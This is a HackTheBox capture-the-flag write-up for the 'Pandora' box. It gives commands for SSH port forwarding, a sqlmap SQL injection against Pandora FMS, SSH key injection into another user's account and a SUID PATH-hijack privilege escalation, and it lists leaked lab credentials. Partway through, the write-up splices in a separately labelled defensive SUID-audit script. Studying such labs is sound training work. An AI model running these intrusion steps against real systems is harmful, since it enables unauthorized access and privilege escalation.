
Pandora — HackTheBox (write-up)

Difficulty: Easy | Box: Pandora (HackTheBox) | Author: dsec | Date: 2024-12-06


TL;DR

SNMP enumeration leaked SSH creds for daniel. An internal-only Pandora FMS instance was reachable via SSH port forwarding. SQLi on the session_id parameter led to admin access. Uploaded a reverse shell, pivoted to matt via SSH key injection, then abused a SUID binary that called tar without a full path (PATH hijack) for root.


Target info

  • Host: 10.129.224.93
  • Services discovered via nmap

Enumeration

[screenshot: Nmap results]

[screenshot: UDP scan]

SNMP enumeration

[screenshot: SNMP results]

[screenshot: SNMP creds]

Found creds: daniel:HotelBabylon23

ssh daniel@10.129.224.93

[screenshot: SSH as daniel]


Internal service discovery

Checked Apache site configurations:

cd /etc/apache2/sites-enabled
cat pandora.conf | grep -Pv "^\s*#" | grep .

Found <VirtualHost localhost:80> -- Pandora FMS was only listening on localhost, so it is not reachable from the outside.

SSH port forward to access:

ssh -L 9001:localhost:80 daniel@10.129.224.93

Browsed to 127.0.0.1:9001 on Kali:

[screenshot: Pandora FMS login]

[screenshot: Pandora FMS dashboard]


SQLi to admin

[screenshot: CVE info]

SQLi on the session_id parameter in chart_generator.php:

sqlmap -u 'http://pandora.panda.htb:9001/pandora_console/include/chart_generator.php?session_id=1'

Injection types found: boolean-based blind, error-based, time-based blind (MySQL/MariaDB).

Dumped sessions from sqlmap and used them to access the admin panel:

[screenshot: Session hijack]

[screenshot: Admin access]

[screenshot: File upload]


Lateral movement

sudo gave a weird permissions error:

[screenshot: sudo error]

[screenshot: SUID binary]

The SUID binary stood out but couldn't be exploited from the current shell. Dropped an SSH key for a full shell:

ssh-keygen -t ed25519 -f ./id_ed25519

On the remote machine (in matt's home directory), install the public key; sshd refuses keys in group/world-writable locations, so the permissions are set explicitly:

mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEqwSCwB7vK26CckpfDL1D0+/z6sf42jocBMLUsbca+m daniel@daniel" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Back on Kali, log in with the matching private key:

ssh -i id_ed25519 matt@panda.htb

Privesc

Now the SUID binary could be run:

[screenshot: SUID tar binary]

The binary used tar without a full path. Created a malicious tar in a writable directory and prepended it to PATH:

[screenshot: PATH hijack]

[screenshot: Root shell]
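The PATH hijack above works because the SUID binary invokes tar by bare name. The following audit script is an added example (not part of this write-up): it extracts the printable strings of a binary and flags command names that appear without an absolute path, so an administrator can find the same defect before an attacker does. The command list and the `audit_file` / `audit_system` function names are my own choices.

```shell
#!/bin/sh
# Audit SUID binaries for commands invoked by bare name (PATH dependent).
# Mitigation: call helpers by absolute path, or set PATH explicitly in the
# program before exec. Constructed example, not the box's own binary.

# Helpers commonly shelled out to by privileged wrappers.
SUSPECT_CMDS="tar cp mv rm chmod chown curl wget"

# audit_file FILE: print one FLAG line per bare-name invocation found.
# Returns 1 if anything was flagged, 0 if the file looks clean.
audit_file() {
    f=$1
    found=0
    # Printable strings of the binary; fall back to tr if strings is absent.
    if command -v strings >/dev/null 2>&1; then
        strs=$(strings -n 3 "$f")
    else
        strs=$(tr -c '[:print:]' '\n' < "$f")
    fi
    for cmd in $SUSPECT_CMDS; do
        # "tar -czf ..." or a lone "tar" is flagged; "/usr/bin/tar ..." is not,
        # because the absolute path puts a "/" before the command name.
        if printf '%s\n' "$strs" | grep -Eq "^$cmd( |\$)"; then
            printf 'FLAG %s: invokes "%s" by bare name (PATH dependent)\n' "$f" "$cmd"
            found=1
        fi
    done
    return $found
}

# audit_system: run audit_file over every SUID-root file on local filesystems.
audit_system() {
    find / -xdev -perm -4000 -type f 2>/dev/null | while read -r suid; do
        audit_file "$suid" || true
    done
}

# Usage: sh audit_suid.sh FILE...   (or call audit_system for a full sweep)
if [ "$#" -gt 0 ]; then
    for target in "$@"; do
        audit_file "$target" || true
    done
else
    echo "usage: $0 FILE...  (or source this file and run audit_system)" >&2
fi
```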


Lessons & takeaways

  • Always check for internal-only services via Apache/nginx site configs -- SSH port forwarding unlocks them
  • SNMP can leak credentials; don't skip UDP enumeration
  • When a shell is too limited for sudo/SUID exploitation, inject an SSH key for a proper interactive session
  • SUID binaries calling commands without full paths are vulnerable to PATH hijacking